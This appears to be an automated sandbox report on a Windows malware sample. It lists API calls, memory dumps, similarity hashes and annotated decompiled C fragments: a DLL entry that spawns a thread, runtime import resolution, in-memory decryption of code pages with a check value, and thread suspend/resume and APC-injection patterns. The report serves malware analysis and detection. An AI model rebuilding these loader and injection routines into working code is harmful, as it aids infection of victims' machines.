• LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 73751C03
• lstrlenA.KERNEL32(00000002), ref: 73751C19
• memset.NTDLL ref: 73751C23
• GetProcAddress.KERNEL32(?,00000002), ref: 73751C86
• lstrlenA.KERNEL32(-00000002), ref: 73751C9B
• memset.NTDLL ref: 73751CA5
Strings
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: lstrlenmemset$AddressLibraryLoadProc
• String ID: ~
• API String ID: 1986585659-1707062198
• Opcode ID: cba98b1490a177697a8782c8dc28b2deb9aeb02dda2e134e4c2916803b928667
• Instruction ID: 39bdc313f8a980a47428dbc49f74e01763e3a7a19869517743ddea74acc61258
• Opcode Fuzzy Hash: cba98b1490a177697a8782c8dc28b2deb9aeb02dda2e134e4c2916803b928667
• Instruction Fuzzy Hash: D8318C72A00205AFDF19DF59C985BAEB7F5BF44216F21406DF80AEB240E736EA41DB50
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00462557: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 0046257C
  • Part of subcall function 00462557: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00462598
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00443CB1
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00443D9C
  • Part of subcall function 00462557: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00462702
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00443CE7
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443CF3
• lstrcmpi.KERNEL32(?,00000000), ref: 00443D30
• StrChrA.SHLWAPI(?,0000002E), ref: 00443D39
• lstrcmpi.KERNEL32(?,00000000), ref: 00443D4B
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
• String ID:
• API String ID: 3901270786-0
• Opcode ID: 7fc3b20866ef05f80dc7735befcca6849fef0455ec07040ecec385e984b47ef5
• Instruction ID: 3892bce291c124798951be46d0a2af21cdd47d5ddb7df27decd410c5a3ea9237
• Opcode Fuzzy Hash: 7fc3b20866ef05f80dc7735befcca6849fef0455ec07040ecec385e984b47ef5
• Instruction Fuzzy Hash: BD317171504311ABE3218F15DC44B5BBBE8FF89B55F100A1EF88466280D778EE44CBAA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00446498: memset.NTDLL ref: 004464A2
• OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,00452CAC), ref: 0045F726
• SetEvent.KERNEL32(00000000,?,00452CAC), ref: 0045F733
• Sleep.KERNEL32(00000BB8,?,00452CAC), ref: 0045F73E
• ResetEvent.KERNEL32(00000000,?,00452CAC), ref: 0045F745
• CloseHandle.KERNEL32(00000000,?,00452CAC), ref: 0045F74C
• GetShellWindow.USER32 ref: 0045F757
• GetWindowThreadProcessId.USER32(00000000), ref: 0045F75E
  • Part of subcall function 00457655: RegCloseKey.ADVAPI32(?), ref: 004576D8
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
• String ID:
• API String ID: 53838381-0
• Opcode ID: 3769b02c1fae3e31287f24acd0d35a155c857c00b93d159238f1a75b20c050d3
• Instruction ID: afba4bfa1f2a8db0c25da631aad832ee2da103837217c8c1388305c37a969157
• Opcode Fuzzy Hash: 3769b02c1fae3e31287f24acd0d35a155c857c00b93d159238f1a75b20c050d3
• Instruction Fuzzy Hash: 07210736100210ABD7107B67EC89D6B7BADEBC9716B05443EF90583252EBB86809D77F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8; // DllMain fdwReason; 0 is DLL_PROCESS_DETACH
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x73754108); // global reference counter
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags = *0x7375410c;
						if( *0x7375410c != 0) {
							_t36 = 0x2710; // 10000
							while(1) {
								SleepEx(0x64, 1); // executed; 100 ms alertable wait
								__eflags = *0x73754118;
								if( *0x73754118 == 0) { // leave the loop once the flag clears
									break;
                                                                                                                                        								}
                                                                                                                                        								_t36 = _t36 - 0x64;
                                                                                                                                        								__eflags = _t36;
                                                                                                                                        								if(_t36 > 0) {
                                                                                                                                        									continue;
                                                                                                                                        								}
                                                                                                                                        								break;
                                                                                                                                        							}
                                                                                                                                        							CloseHandle( *0x7375410c);
                                                                                                                                        						}
                                                                                                                                        						HeapDestroy( *0x73754110); // executed
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					if(_t9 == 1 && InterlockedIncrement(0x73754108) == 1) {
                                                                                                                                        						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                        						_t41 = _t18;
                                                                                                                                        						 *0x73754110 = _t18;
                                                                                                                                        						if(_t18 == 0) {
                                                                                                                                        							L6:
                                                                                                                                        							_v8 = 0;
                                                                                                                                        						} else {
                                                                                                                                        							 *0x73754130 = _a4;
                                                                                                                                        							asm("lock xadd [eax], ebx");
                                                                                                                                        							_t23 = CreateThread(0, 0, E73751359, E73751F8A(_a12, 0, 0x73754118, _t41), 0,  &_a8); // executed
                                                                                                                                        							 *0x7375410c = _t23;
                                                                                                                                        							if(_t23 == 0) {
                                                                                                                                        								asm("lock xadd [esi], eax");
                                                                                                                                        								goto L6;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _v8;
                                                                                                                                        			}

APIs
• InterlockedIncrement.KERNEL32(73754108), ref: 737514ED
• HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 73751502
• CreateThread.KERNEL32 ref: 73751539
• InterlockedDecrement.KERNEL32(73754108), ref: 73751559
• SleepEx.KERNELBASE(00000064,00000001), ref: 73751573
• CloseHandle.KERNEL32 ref: 7375158F
• HeapDestroy.KERNELBASE ref: 7375159B
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
• String ID:
• API String ID: 3416589138-0
• Opcode ID: 1f091eee6d3473a8f9bb1443170e707b9145b69cd1428f336acfe94e57f72980
• Instruction ID: ff187a91487366efa2a37cdaed62c381da3661d85a849fb199198d3ccd5c9b9b
• Opcode Fuzzy Hash: 1f091eee6d3473a8f9bb1443170e707b9145b69cd1428f336acfe94e57f72980
• Instruction Fuzzy Hash: A2218A33900216AFEB09AF6BCC85B597BBAFB556527354115F45FD3290DB3989008F50
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044EA3B: lstrlen.KERNEL32(?,00000000,00450A89,00000027,0046E0F8,?,00000000,?,?,00450A89,Local\,00000001,?,0046088E,?,00000000), ref: 0044EA71
  • Part of subcall function 0044EA3B: lstrcpy.KERNEL32(00000000,00000000), ref: 0044EA95
  • Part of subcall function 0044EA3B: lstrcat.KERNEL32(00000000,00000000), ref: 0044EA9D
• RegOpenKeyExA.KERNELBASE(004464BA,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FA9
• RegOpenKeyExA.ADVAPI32(004464BA,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FBD
• RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00464006
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Open$Closelstrcatlstrcpylstrlen
• String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
• API String ID: 4131162436-710576342
• Opcode ID: 4c936835cd2d7b6fdc8572ca11b0cd65dea93a918736b499774d832aca304b31
• Instruction ID: 0cd038acefed68c1c852560d7d192ce499ffa299389f36f46dbd7457e1762007
• Opcode Fuzzy Hash: 4c936835cd2d7b6fdc8572ca11b0cd65dea93a918736b499774d832aca304b31
• Instruction Fuzzy Hash: 11115B7190021CFFDB10DF91EC82CAFBBBCEA45758B10407AFA04A2111E678AE089B65
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.NTDLL ref: 004583EE
  • Part of subcall function 004450BE: OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
  • Part of subcall function 004450BE: IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
  • Part of subcall function 004450BE: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
• ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,0046E088,?,00000000), ref: 004584A8
• WaitForSingleObject.KERNEL32(00000064), ref: 004584B6
• SuspendThread.KERNEL32(?), ref: 004584C9
  • Part of subcall function 00441D18: memset.NTDLL ref: 00441FDA
• ResumeThread.KERNELBASE(?), ref: 0045854C
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
• String ID:
• API String ID: 2336522172-0
• Opcode ID: 3735c4c20fa4a0db738dea70f604b6f6fada234586fdcb74b2e9b9f44fda8610
• Instruction ID: f1b5450761e751aa7b8a9626065499eca74d069bea3276a739c704ddff6e33a3
• Opcode Fuzzy Hash: 3735c4c20fa4a0db738dea70f604b6f6fada234586fdcb74b2e9b9f44fda8610
• Instruction Fuzzy Hash: B841CC71900209BFEF119F95CC85AAE7BB9BF00305F10442EFD05A6262EF78DE598B59
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E73751779(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
	intOrPtr _v8;
	_Unknown_base(*)()* _t28;
	_Unknown_base(*)()* _t32;
	_Unknown_base(*)()* _t35;
	_Unknown_base(*)()* _t38;
	_Unknown_base(*)()* _t41;
	intOrPtr _t44;
	struct HINSTANCE__* _t48;
	intOrPtr _t54;

	// Allocate a 0x20-byte context block; on failure return error code 8.
	_t54 = E737518C2(0x20);
	if(_t54 == 0) {
		_v8 = 8;
	} else {
		// Resolve imports at runtime: module and function names are read from a table
		// addressed relative to *0x73754150, so no plain import entries exist in the PE.
		_t48 = GetModuleHandleA( *0x73754150 + 0x73755014);
		_v8 = 0x7f;
		_t28 = GetProcAddress(_t48,  *0x73754150 + 0x737550dc);
		 *(_t54 + 0xc) = _t28;
		if(_t28 == 0) {
			L8:
			// Any unresolved function frees the context block and fails with 0x7f.
			E737514B6(_t54);
		} else {
			_t32 = GetProcAddress(_t48,  *0x73754150 + 0x737550ec);
			 *(_t54 + 0x10) = _t32;
			if(_t32 == 0) {
				goto L8;
			} else {
				_t35 = GetProcAddress(_t48,  *0x73754150 + 0x737550ff);
				 *(_t54 + 0x14) = _t35;
				if(_t35 == 0) {
					goto L8;
				} else {
					_t38 = GetProcAddress(_t48,  *0x73754150 + 0x73755114);
					 *(_t54 + 0x18) = _t38;
					if(_t38 == 0) {
						goto L8;
					} else {
                                                                                                                                        									_t41 = GetProcAddress(_t48,  *0x73754150 + 0x7375512a);
                                                                                                                                        									 *(_t54 + 0x1c) = _t41;
                                                                                                                                        									if(_t41 == 0) {
                                                                                                                                        										goto L8;
                                                                                                                                        									} else {
                                                                                                                                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                        										_t44 = E73751CEF(_t54, _a8); // executed
                                                                                                                                        										_v8 = _t44;
                                                                                                                                        										if(_t44 != 0) {
                                                                                                                                        											goto L8;
                                                                                                                                        										} else {
                                                                                                                                        											 *_a12 = _t54;
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _v8;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 737518C2: HeapAlloc.KERNEL32(00000000,-00000008,73751A89,?,?,00000000,-00000008,73751DE8), ref: 737518CE
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,737515D5,?,?,?,00000002,?,?,?), ref: 7375179E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517C0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517D6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 737517EC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73751802
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 73751818
                                                                                                                                          • Part of subcall function 73751CEF: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 73751D4C
                                                                                                                                          • Part of subcall function 73751CEF: memset.NTDLL ref: 73751D6E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1632424568-0
                                                                                                                                        • Opcode ID: 8caa2d901969e53cc2bba338edc945f8dc3200445258b4aa195b91da4a25204a
                                                                                                                                        • Instruction ID: f16097942c0af40ad777790f4e77499a771580c5f7905ec259a1ab21563245cd
                                                                                                                                        • Opcode Fuzzy Hash: 8caa2d901969e53cc2bba338edc945f8dc3200445258b4aa195b91da4a25204a
                                                                                                                                        • Instruction Fuzzy Hash: 832151B290030AAFDB14EF6AC984F9A7BFCEF042657214125F51AC7240E778E905DFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00000000,?,?,?,?,00441E28,?,?,?,00000000,74B05520), ref: 00442735
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00442757
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0044276D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00442783
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00442799
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 004427AF
                                                                                                                                          • Part of subcall function 0045620F: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 0045626C
                                                                                                                                          • Part of subcall function 0045620F: memset.NTDLL ref: 00456290
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3012371009-0
                                                                                                                                        • Opcode ID: 696d6b2d8d2cb31690a5831aceef3d12d572c41b65a9086cab7a8309c7d7894e
                                                                                                                                        • Instruction ID: 5ddf3c3688af73f2a64327d2669b175695e017d678f7fa588f43fec6c4c84435
                                                                                                                                        • Opcode Fuzzy Hash: 696d6b2d8d2cb31690a5831aceef3d12d572c41b65a9086cab7a8309c7d7894e
                                                                                                                                        • Instruction Fuzzy Hash: CB214BB550120AEFF720DF6ACD44E6B77ECEB08744B01456AF909C7211E6B4E9098B79
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,0044403C), ref: 0044E3AF
                                                                                                                                        • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 0044E3C4
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0044E3CF
                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0044E3D9
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044E3E0
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0044E3E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3832013932-0
                                                                                                                                        • Opcode ID: 12596349bf31f596c501f28d7d30d79e11c5ccb80b27889151229eaf1f3ceb5b
                                                                                                                                        • Instruction ID: ab5f300a1621609e2318bcf75041cf18d9905849181a1eef1f8059073a846789
                                                                                                                                        • Opcode Fuzzy Hash: 12596349bf31f596c501f28d7d30d79e11c5ccb80b27889151229eaf1f3ceb5b
                                                                                                                                        • Instruction Fuzzy Hash: 52F08232145221FBD3221FA1AC08F9FBB68FB09711F010E29FA0191160EFB488059BAF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(0046E130,74B04D40,00000018,00000001,00000000,74B04D40,0044BA3A,?,?), ref: 004420C0
                                                                                                                                        • GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,74B04D40,0044BA3A,?,?), ref: 004420E5
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 004420F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule$memcpy
                                                                                                                                        • String ID: KERNEL32.DLL$NTDLL.DLL
                                                                                                                                        • API String ID: 1864057842-633099880
                                                                                                                                        • Opcode ID: 5fe7aa475cf48413b40c2bd25bbd2b532fcbc4351233f2802ba7ac7d0c5044aa
                                                                                                                                        • Instruction ID: e05c9dec8cb2f48727ccf211c275cfbd2aa8e249c99f0c65aedc9d599429b64d
                                                                                                                                        • Opcode Fuzzy Hash: 5fe7aa475cf48413b40c2bd25bbd2b532fcbc4351233f2802ba7ac7d0c5044aa
                                                                                                                                        • Instruction Fuzzy Hash: 3D010076600300AAF7119F6AEE41717B6D5BB94701F50043BF644A32A0EAF848088B2F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044E8F7: RegCreateKeyA.ADVAPI32(80000001,03BD8900,?), ref: 0044E90C
                                                                                                                                          • Part of subcall function 0044E8F7: lstrlen.KERNEL32(03BD8900,00000000,00000000,?,?,00461E90,00000000,?), ref: 0044E93A
                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 004513F2
                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1633053242-0
                                                                                                                                        • Opcode ID: 1487300cb69dc6cbc1db5664a4c2f3a26c0c5aa4c64709b92cc5dead600bc24a
                                                                                                                                        • Instruction ID: c4237704f3a086a754ef63f5ff8276de08caed57676454131c134ada2f1e3b54
                                                                                                                                        • Opcode Fuzzy Hash: 1487300cb69dc6cbc1db5664a4c2f3a26c0c5aa4c64709b92cc5dead600bc24a
                                                                                                                                        • Instruction Fuzzy Hash: EB1179B6A00149BFDB019F95CC84CAF7BBEFB48345B11042AF90193221EA759D55DB64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044128D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00441295
                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 004412AC
                                                                                                                                        • VirtualProtect.KERNEL32(?,?,-4CD94B84,?), ref: 004412D1
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 004412DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$ErrorLastProtect$Query
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 148356745-0
                                                                                                                                        • Opcode ID: 01e89a372eb900b566284856fefd5d7dc00e05d8f322da54bdb854cc3b84da11
                                                                                                                                        • Instruction ID: 44691aa38cb7ffd44075763c36bfeb7e68cbf3f9a196c766e1f2509e565c4075
                                                                                                                                        • Opcode Fuzzy Hash: 01e89a372eb900b566284856fefd5d7dc00e05d8f322da54bdb854cc3b84da11
                                                                                                                                        • Instruction Fuzzy Hash: 9D018C32200209BBEF119F95CD808DABBBCFF0D348B00403AF905E2120EBB4D915EB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004415D3
                                                                                                                                        • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044165D
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000064,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044166B
                                                                                                                                        • SuspendThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0044167E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3168247402-0
                                                                                                                                        • Opcode ID: d4dbc6d2604b210560e8147b5e8e8318f7fe96240ec12177fa10806d841ba1e8
                                                                                                                                        • Instruction ID: 324bde36027ec370819d7ad80b7fefe1de5f15540fadd4c5bd084d82ecc886dd
                                                                                                                                        • Opcode Fuzzy Hash: d4dbc6d2604b210560e8147b5e8e8318f7fe96240ec12177fa10806d841ba1e8
                                                                                                                                        • Instruction Fuzzy Hash: 01418A71108301AFE721DF51CD8196BBBE9FB88304F04092EFA94922B0E775D954CB6B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 83%
// Decompiler output for the function at 0x7375123E. The comments describe what the listed
// code does; the callees E73751B43 and E73751B9D are not shown on this page.
E7375123E(void* __edi, intOrPtr _a4) {
    signed int _v8;
    intOrPtr _v12;
    unsigned int _v16;
    intOrPtr _v20;
    char _v24;
    void* _v28;
    intOrPtr _v32;
    intOrPtr* _v36;
    void* _v40;
    signed int _v48;
    signed int _v52;
    intOrPtr _t42;
    void* _t49;
    intOrPtr _t50;
    intOrPtr _t53;
    signed int _t61;
    intOrPtr _t78;
    void* _t79;

    _t78 =  *0x73754130;                                  // base value read from a global of this module
    _t42 = E73751B43(_t78,  &_v24,  &_v16);               // returns 0 on success; fills offset (_v24) and size (_v16) of the region
    _v20 = _t42;                                           // _v20 is the Win32-style result code returned at the end
    if(_t42 == 0) {
        asm("sbb ebx, ebx");
        // neg/sbb idiom the decompiler lifted only partly: _t61 = (_v16 >> 12) + (_v16 & 0xfff ? 1 : 0),
        // i.e. the size in whole 4 KiB pages, rounded up.
        _t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
        _t79 = _t78 + _v24;                                // region to process = base + offset
        _v40 = _t79;
        _t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed   (MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE: staging buffer)
        _v28 = _t49;
        if(_t49 == 0) {
            _v20 = 8;                                      // ERROR_NOT_ENOUGH_MEMORY
        } else {
            _v8 = _v8 & 0x00000000;                        // page counter = 0
            if(_t61 <= 0) {
                _t50 =  *0x7375414c;                       // no pages: reuse the previously stored check value
            } else {
                _t53 = _t49 - _t79;                        // delta from the region to the staging buffer
                _v32 = _t53;
                _v36 = _t53 + _a4 + 0x73755132;            // address 0x73755132 + _a4, translated into the staging buffer
                _v12 = _t79;
                while(1) {                                 // one iteration per 4 KiB page of the region
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    asm("rol edx, cl");                    // inline copy/rotate not lifted; likely sets _v48/_v52 used below
                    E73751B9D(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);   // per-page transform into the staging copy (routine not shown)
                    _t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));                  // check value: sum of two dwords at a fixed place in the staging copy
                    _v8 = _v8 + 1;
                    _v12 = _v12 + 0x1000;
                     *0x7375414c = _t50;                   // check value persisted in a global
                    if(_v8 >= _t61) {
                        break;
                    }
                    _t53 = _v32;
                }
            }
            if(_t50 != 0x59935a40) {
                _v20 = 0xc;                                // check failed: ERROR_INVALID_ACCESS, original region left untouched
            } else {
                memcpy(_v40, _v28, _v16);                  // check passed: transformed pages overwrite the region in place
            }
            VirtualFree(_v28, 0, 0x8000); // executed     (MEM_RELEASE the staging buffer)
        }
    }
    return _v20;
}

Instruction addresses for the listing above: 0x73751245 to 0x73751356 (per-line address column collapsed).

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,?,?,-00000008,-00000008), ref: 73751294
                                                                                                                                        • memcpy.NTDLL(?,?,-00000008,?,?,-00000008,-00000008,?,?,?,?,?,?,?,?,73751DC2), ref: 73751326
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,-00000008,-00000008), ref: 73751341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFreememcpy
                                                                                                                                        • String ID: Nov 3 2020
                                                                                                                                        • API String ID: 4010158826-2364069389
                                                                                                                                        • Opcode ID: e9e6119066e064e975cb893313b999bb168c50826575325291f25c455357edfc
                                                                                                                                        • Instruction ID: fd4b5ddb571d760755a686a3bba773cdb479e08d5485e0212e76ef9d6af3ab9c
                                                                                                                                        • Opcode Fuzzy Hash: e9e6119066e064e975cb893313b999bb168c50826575325291f25c455357edfc
                                                                                                                                        • Instruction Fuzzy Hash: 03317A71E0021DABDF05DF99C985BDEBBB9BF08305F248169E905BB240E775AA05CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00444875
